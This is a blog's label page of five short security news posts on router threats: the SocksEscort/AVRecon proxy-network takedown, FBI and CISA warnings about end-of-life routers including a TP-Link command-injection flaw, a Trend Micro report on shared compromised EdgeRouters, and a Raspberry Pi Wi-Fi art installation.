Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Internet Routers. Show all posts
Network Intrusion
Botnet Botnet attack Cyber Security CyberCrime Internet Routers Malware attacks Network Intrusion

Global Law Enforcement Disrupts SocksEscort Proxy Network Powered by AVRecon Malware

 

Federal and regional police units, working alongside independent digital security experts, took down the SocksEscort hacking infrastructure. This setup used hacked gateway gadgets - infected by AVRecon - to route illicit online traffic through hidden channels. 

A team at Black Lotus Labs, under Lumen Technologies, aided the takedown operation together with officials from the U.S. Department of Justice. Over multiple years, authorities found the proxy system kept around twenty thousand compromised gadgets active weekly - revealing both reach and staying power. 

SocksEscort first came into view back in 2023, though signs point to activity stretching well beyond ten years. Operation relied on offering entry to seemingly legitimate IP addresses - pulled from home and office network devices. Because these connections appeared ordinary, users could mask malicious data flows under normal ISP cover. Detection tools often failed, misled by the everyday digital footprint left behind. 

By early 2026, authorities reported the system had provided entry to vast numbers of IP addresses across its lifespan. Nearly 8,000 compromised routers remained operational at that point. Within the U.S., roughly a quarter of those devices were found scattered throughout the country. Though focused on one case, the ripple effects touched various forms of monetary misconduct. 

A trail led authorities to connect SocksEscort with nearly $1 million siphoned from digital wallets belonging to someone in New York. Separate findings showed about $700,000 lost due to deceptive schemes targeting an industrial company based in Pennsylvania. Victims among American military personnel also faced damage after personal banking records were breached, adding further strain. 

Dozens of domains and servers linked to the network were seized across Europe through joint efforts steered by Europol. Backing came from law enforcement agencies in Austria, France, and the Netherlands. Around $3.5 million in digital currency was blocked during the course of the mission. What powered the entire operation was AVRecon, a form of malicious software aimed at Linux-run home and small office routers. 

By June 2023, it had taken hold on over seventy thousand machines, forming a vast network of hijacked devices. This network served one purpose: strengthening the reach of SocksEscort. Analysts found something unusual - none of the affected IPs showed up in unrelated botnet activity, pointing toward tightly managed usage. Despite setbacks during early 2023 that briefly disrupted operations through severed command channels, the group managed recovery by reconstructing systems. Control returned via decentralized nodes rather than a single hub. Activity restarted months afterward with modified communication pathways. 

Early in 2025, more than 280,000 distinct IP addresses got caught up in the activity. Although infections spread globally, those based in the U.S. and the U.K. stood out - due to their appeal in hiding harmful network behavior. Outdated routers should be swapped out, many professionals suggest. Firmware updates come next on the list for staying protected. Default login details? Better revise them promptly. Remote functions that go unused tend to invite trouble - shutting those off helps block intrusions. Reducing exposure often begins with these small shifts. 

A single operation reveals how digital crime groups using hidden relay systems are expanding their reach. Global teamwork across borders proves essential to weaken such operations.
Read more »
Malware attacks
Airport WiFi Security Cyber Attacks cybersecurity threats FBI FBI FBI warning Hacker attack Internet Routers Malware attacks

FBI Warns Outdated Wi-Fi Routers Are Being Targeted in Malware and Botnet Attacks

 

Cybersecurity risks could rise when outdated home routers stop getting manufacturer support, federal agents say. Devices from the late 2000s into the early 2010s often fall out of update cycles, leaving networks open. Without patches, vulnerabilities stay unaddressed - making intrusion more likely over time. Older models reaching end-of-life lack protection upgrades once available. This gap draws attention from officials tracking digital threats to household systems. 

Older network equipment often loses support as makers discontinue update releases. Once patching ends, weaknesses found earlier stay open indefinitely. Such gaps let hackers break in more easily. Devices like obsolete routers now attract criminals who deploy malicious code. Access at admin level gets seized without owners noticing. Infected machines may join hidden networks controlled remotely. Evidence shows law enforcement warning about these risks repeatedly. 

Built from hijacked devices, botnets answer to remote operators. These collections of infected machines frequently enable massive digital assaults. Instead of serving legitimate users, they route harmful data across the web. Criminals rely on them to mask where attacks originate. Through hidden channels, wrongdoers stay anonymous during operations. 

Back in 2011, Linksys made several routers later flagged as weak by the FBI. Devices like the E1200, E2500, and E4200 came under scrutiny due to security flaws. Earlier models also appear on the list - take the WRT320N, launched in 2009. Then there is the M10, hitting shelves a year after that one. Some routers come equipped with remote setup options, letting people adjust settings using web-connected interfaces. 

Though useful, such access may lead to problems if flaws are left unfixed. Hackers regularly search online for devices running open management ports, particularly ones stuck on old software versions. Hackers start by spotting weak routers, then slip through software gaps to plant harmful programs straight onto the machine. Once inside, that hidden code opens the door wide - giving intruders complete control while setting up secret talks with remote hubs. 

Sometimes, these taken devices ping those distant centers each minute, just to say they’re still online and waiting. Opened network ports on routers might let malware turn devices into proxies. With such access, attackers send harmful data across infected networks instead of launching attacks directly. Some even trade entry rights to third parties wanting to mask where they operate from. What makes router-based infections tricky is how hard they are to spot for most people. 

Since standard antivirus tools target laptops and phones, routers often fall outside their scope. Running within the router's own software, the malware stays hidden even when everything seems to work fine. The network keeps running smoothly, masking the presence of harmful code tucked deep inside. Older routers without regular updates become weak spots over time. 

Because of this, specialists suggest swapping them out. A modern replacement brings continued protection through active maintenance. This shift lowers chances of intrusions via obsolete equipment found in personal setups.
Read more »
Youtube
Internet Routers LED Raspberry Pi Software Technology WiFi Youtube

Raspberry Pi Project Turns Wi-Fi Signals Into Visual Light Displays

 



Wireless communication surrounds people at all times, even though it cannot be seen. Signals from Wi-Fi routers, Bluetooth devices, and mobile networks constantly travel through homes and cities unless blocked by heavy shielding. A France-based digital artist has developed a way to visually represent this invisible activity using light and low-cost computing hardware.

The creator, Théo Champion, who is also known online as Rootkid, designed an installation called Spectrum Slit. The project captures radio activity from commonly used wireless frequency ranges and converts that data into a visual display. The system focuses specifically on the 2.4 GHz and 5 GHz bands, which are widely used for Wi-Fi connections and short-range wireless communication.

The artwork consists of 64 vertical LED filaments arranged in a straight line. Each filament represents a specific portion of the wireless spectrum. As radio signals are detected, their strength and density determine how brightly each filament lights up. Low signal activity results in faint and scattered illumination, while higher levels of wireless usage produce intense and concentrated light patterns.

According to Champion, quiet network conditions create a subtle glow that reflects the constant but minimal background noise present in urban environments. As wireless traffic increases, the LEDs become brighter and more saturated, forming dense visual bands that indicate heavy digital activity.

A video shared on YouTube shows the construction process and the final output of the installation inside Champion’s Paris apartment. The footage demonstrates a noticeable increase in brightness during evening hours, when nearby residents return home and connect phones, laptops, and other devices to their networks.

Champion explained in an interview that his work is driven by a desire to draw attention to technologies people often ignore, despite their significant influence on daily life. By transforming technical systems into physical experiences, he aims to encourage viewers to reflect on the infrastructure shaping modern society and to appreciate the engineering behind it.

The installation required both time and financial investment. Champion built the system using a HackRF One software-defined radio connected to a Raspberry Pi. The radio device captures surrounding wireless signals, while the Raspberry Pi processes the data and controls the lighting behavior. The software was written in Python, but other components, including the metal enclosure and custom circuit boards, had to be professionally manufactured.

He estimates that development involved several weeks of experimentation, followed by a dedicated build phase. The total cost of materials and fabrication was approximately $1,000.

Champion has indicated that Spectrum Slit may be publicly exhibited in the future. He is also known for creating other technology-focused artworks, including interactive installations that explore data privacy, artificial intelligence, and digital systems. He has stated that producing additional units of Spectrum Slit could be possible if requested.

Read more »
Routers
CISA CISA advisory CISA warning Cyber Security Hacker attack Internet Routers internet Security Public Wifi router security Routers

CISA Warns of Renewed Exploits Targeting TP-Link Routers with Critical Flaws

 

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has raised fresh concerns about several outdated TP-Link router models that are being actively exploited by cybercriminals. Despite the flaw being identified years ago, it has re-emerged in recent attack campaigns, prompting its addition to CISA’s Known Exploited Vulnerabilities (KEV) catalog. 

The security issue is a command injection vulnerability with a high severity rating of 8.8. It impacts three specific models: TP-Link TL-WR940N, TL-WR841N, and TL-WR740N. The flaw exists within the routers’ web-based management interface, where improperly validated input allows hackers to execute unauthorized commands directly on the devices. This makes it possible for attackers to gain control of the routers remotely if remote access is enabled, or locally if they’re on the same network. 

Although this vulnerability has been publicly known for years, recent activity suggests that malicious actors are targeting these devices once again. According to cybersecurity researchers, the attack surface remains significant because these routers are still in use across many households and small offices. 

CISA has mandated that all federal agencies remove the affected router models from their networks by July 7, 2025. It also strongly recommends that other organizations and individuals replace the devices to avoid potential exploitation. 

The affected routers are particularly vulnerable because they are no longer supported by the manufacturer. The TL-WR940N last received a firmware update in 2016, the TL-WR841N in 2015, and the TL-WR740N has gone without updates for over 15 years. As these devices have reached end-of-life status, no further security patches will be provided. Users are urged to upgrade to newer routers that are regularly updated by manufacturers. 

Modern Wi-Fi routers often include enhanced performance, support for more devices, and built-in security protections. Some brands even offer network-wide security features to safeguard connected devices against malware and intrusion attempts. Additionally, using antivirus software with extra security tools, such as VPNs and threat detection, can further protect against online threats. 

Outdated routers not only put your personal information at risk but also slow down internet speed and struggle to manage today’s connected home environments. Replacing obsolete hardware is an important step in defending your digital life. 

Ensuring you’re using a router that receives timely security updates, combined with good cybersecurity habits, can significantly reduce your exposure to cyberattacks. 

CISA’s warning is a clear signal that relying on aging technology leaves both individuals and organizations vulnerable to renewed threats.
Read more »
Threat Landscape
Cyber Attacks Endpoint Device Internet Routers nation-state hackers Threat Landscape

Hackers are Targeting Routers Across the Globe

 

When hackers identify an unsecured router, they penetrate it by installing malware that provides them persistence, the ability to launch distributed denial of service (DDoS) assaults, hide malicious data, and more. But what happens when the hackers discover a router that has already been infiltrated by a rival gang? 

Trend Micro cybersecurity researchers published a report that discovered one of two things: either one party allows the other to use the compromised infrastructure for a charge, or they both find a separate technique to break into the device and use it simultaneously. 

The researchers used Ubiquity's EdgeRouters as an example of internet routers that were exploited concurrently by a number of hacker groups, some of which were state-sponsored and others were financially motivated. 

“Cybercriminals and Advanced Persistent Threat (APT) actors share a common interest in proxy anonymization layers and Virtual Private Network (VPN) nodes to hide traces of their presence and make detection of malicious activities more difficult,” the researchers stated. “This shared interest results in malicious internet traffic blending financial and espionage motives.” 

When it comes to Ubiquity, Trend Micro analysts reported that the APT28 criminal leveraged the endpoints for "persistent espionage campaigns." APT28 is a Russian state-sponsored outfit also known as Fancy Bear or Pawn Storm. At the same time, they discovered a financially motivated group known as the Canadian Pharmacy Gang, which used the same infrastructure to launch pharmaceutical-related phishing activities. Finally, they discovered the Ngioweb malware being loaded directly into the RAM of these devices, which was attributed to the Ramnit group.

The main reason EdgeRouters were so often targeted was that their victims either left them completely undefended or with only weak security. They don't stand out much from other routers, which are all equally desirable targets for hackers. Trend Micro found that this is due to the fact that they have less stringent password demands, are rarely updated, and operate on powerful operating systems that can be utilised for a variety of purposes.
Read more »
Subscribe to: Comments (Atom)